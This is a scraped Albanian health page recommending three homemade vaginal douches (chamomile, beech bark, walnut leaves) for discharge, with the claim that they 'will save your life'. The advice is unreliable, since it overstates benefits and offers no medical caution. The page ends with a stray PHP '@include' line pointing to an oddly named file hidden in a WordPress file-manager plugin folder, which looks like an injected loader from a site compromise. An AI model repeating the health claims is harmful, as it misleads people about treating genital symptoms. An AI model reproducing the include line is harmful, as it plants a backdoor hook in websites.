Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

3 shpëlarës natyralë për sekrecionet vaginale, do t’ju shpëtojnë jetën

3 shpëlarës natyralë për sekrecionet vaginale, do t’ju shpëtojnë jetën

Nëse keni kruarje dhe bezdi nga sekrecionet vaginale, mos i neglizhoni problemet që shkaktojnë. Përdorni 3 shpëlarësit e mëposhtëm natyralë, do t’ju shpëtojnë jetën. Ja cilët janë ata dhe si t’i përdorni:

Kamomili:
Metoda që kanë përdorur gjyshet dhe mamatë tona është ajo që nuk gabon asnjëherë. Zieni lulet e kamomilit dhe lëngun e përftuar përdoreni për shpëlarje vaginale, në rastet e sekrecioneve të bardha ose me erë të keqe. Vendosni për 5 – 10 minuta një lugë të madhe me lule të kamomilit në një litër ujë të nxehtë, por jo të zierë. Pastaj filtroheni dhe përdoreni derisa të largohen problemet.
Lëkura e ahut:
Shtoni 4 lugë të mëdha nga lëkura e bluar e ahut në 1 litër ujë dhe lëreni të vlojë për 15 minuta. Pastaj përdoreni të vakët për shpëlarje vaginale.
Gjethet e arrës:
Merrni një dorë nga gjethet e arrës dhe hidhini në 1 litër ujë të zierë. Lëreni për 10 minuta. Kullojeni nga papastërtitë dhe pastaj përdoreni për shpëlarje./shije.al

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";